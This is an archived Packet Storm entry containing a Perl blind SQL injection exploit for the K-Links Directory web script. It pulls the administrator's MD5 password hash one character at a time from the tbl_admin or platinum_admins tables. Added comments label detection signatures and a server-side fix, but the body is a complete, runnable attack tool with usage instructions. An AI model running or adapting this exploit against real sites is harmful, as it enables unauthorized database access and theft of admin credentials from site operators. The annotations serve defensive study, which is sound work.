klinks-sql.txt

2008-08-13T00:00:00
ID PACKETSTORM:69004
Type packetstorm
Reporter hadihadi
Modified 2008-08-13T00:00:00

Description

                                        
                                            `#!/usr/bin/perl   
###########################################################################  
# K-Links Directory Blind SQL Injection Exploit #  
# ..::virangar security team::.. #  
# www.virangar.net #  
# C0d3d BY:virangar security team ( hadihadi ) #  
#special tnx to: #  
#MR.nosrati,black.shadowes,MR.hesy,Ali007,Zahra #  
#& all virangar members & all hackerz #  
# my lovely friends hadi_aryaie2004 & arash(imm02tal) #  
# ..:::Young Iranina Hackerz::.. #  
###########################################################################  
  
  
use HTTP::Request;  
use LWP::UserAgent;  
  
# Entry point. Expects exactly two arguments: a target URL and a numeric
# mode that selects which table/column pair the injected sub-select reads.
# NOTE(review): the file has no `use strict` / `use warnings`; $host, $mod,
# $tbl and $col are package globals that halghe() reads directly.
if (@ARGV != 2){  
# header() only prints the usage banner; it does not exit, so execution
# continues to the mode check below.
header();  
}  
  
# The first argument is used verbatim as the URL prefix in inject(); no
# scheme, host or path validation is done on it.
$host = $ARGV[0];  
$mod=$ARGV[1];  
if($mod==1){  
$tbl="tbl_admin";  
$col="upass";  
}  
elsif($mod==2){  
$tbl="platinum_admins";  
# For log matching: this is the literal column string placed in mode-2
# requests; the usage banner in header() spells the column differently.
$col="a_apss";  
}  
else{  
# Any mode other than 1 or 2 (including a missing argument) ends here.
print "\nyour option not true\n";  
exit;  
}  
  
# The output is labelled as an MD5 value, which matches the 32 positions
# over the hex alphabet that halghe() iterates.
print "\n md5 Password:\r\n";  
&halghe();  
print "\n[+]Done\n";  
  
  
# halghe: drives the character-by-character extraction loop.
#
# For each of 32 positions it calls inject() with candidate character codes
# 48..57 ('0'-'9') and then, if none matched, 97..102 ('a'-'f'), writing the
# first code that inject() reports as true to STDOUT. If no candidate in
# either range matches, nothing is written for that position.
#
# Takes no arguments; reads the globals $host, $tbl and $col, and uses the
# globals $i, $f and $n as loop state.
#
# Defender note: this produces at most 16 requests per position, i.e. up to
# 512 near-identical GETs from one client that differ only in the position
# and character-code integers. That burst is a usable signal for rate-based
# or sequence-based detection.
sub halghe {  
for($i = 1; $i <= 32; $i++){  
# $f flags whether the current position has been resolved.
$f = 0;  
# First pass: ASCII codes for the digits 0-9.
$n = 48;  
while(!$f && $n <= 57)  
{  
if(&inject($host ,$tbl ,$col ,$i, $n,)){  
$f = 1;  
syswrite(STDOUT, chr($n), 1);  
}  
$n++;  
}  
# Second pass, only when no digit matched: ASCII codes for a-f.
if(!$f){   
$n=97;  
while(!$f && $n <= 102)  
{  
if(&inject($host ,$tbl ,$col ,$i, $n,)){  
$f = 1;  
syswrite(STDOUT, chr($n), 1);  
}  
$n++;  
}}  
}  
}  
# inject: sends one probe request and reports whether the response body is
# free of the two database error strings checked below.
#
# Arguments (positional): URL prefix, table name, column name, 1-based
# character position, candidate character code.
# Returns 1 when neither error pattern appears in the response body;
# otherwise falls off the end without an explicit return, which the caller
# treats as false.
#
# Defender notes:
#  - Every request URL is the supplied prefix followed by the fixed shape
#    `%20and%20substring((select%20<col>%20from%20<tbl>%20limit%200,1),<pos>,1)=char(<code>)/*`
#    and carries the fixed MSIE 7.0 User-Agent set below; both are
#    straightforward to match in web server or WAF logs.
#  - The second pattern checked matches a database "Table ... doesn't exist"
#    message in the page body, so verbose SQL errors returned to clients are
#    part of what this script relies on.
#  - Presumably the trailing id of the report URL reaches a SQL statement
#    unescaped on the server (the page implies this but does not show the
#    vulnerable code); the fix on that side is to bind the id as a typed
#    parameter or reject non-numeric ids.
sub inject {  
my $site = $_[0];  
my $tl = $_[1];  
my $cl = $_[2];  
my $a = $_[3];  
my $b = $_[4];  
  
  
# The URL is built by plain string concatenation; $attack is a package global.
$attack= "$site"."%20and%20substring((select%20"."$cl"."%20from%20$tl%20limit%200,1),"."$a".",1)=char("."$b".")/*";  
  
# $b is reused here: it held the character code above and now holds the
# LWP::UserAgent object.
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";  
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');  
# Despite its name, $req receives the response object returned by request().
$req = $b->request(HTTP::Request->new(GET=>$attack));  
$res = $req->content;  
  
# Only the response body is examined; the HTTP status is not consulted.
if ($res !~ m/You have an error in your SQL syntax;/i and $res !~ m/Table.*doesn't exist/i ){  
return 1;  
}  
  
}  
# header: prints the usage banner to STDOUT, interpolating the script name
# ($0) into the usage and example lines. Takes no arguments and does not
# exit; the caller continues after it returns.
# The banner documents the two modes and states that the host argument must
# be the full report-link URL including its id and the http:// scheme.
sub header {  
print qq{  
###################################################################  
# K-Links Directory Blind SQL Injection Exploit #  
# www.virangar.net #  
# Useage: perl $0 Host option #  
# option: 1 [table=tbl_admin & column=upass] #  
# 2 [table=platinum_admins & column=a_pass] #  
# #  
# Host: full patch to Report Link+id (dont forget http://) #  
# #  
# Example: #  
# perl $0 http://site.com/report/1 2 #  
# #  
###################################################################  
};  
}  
`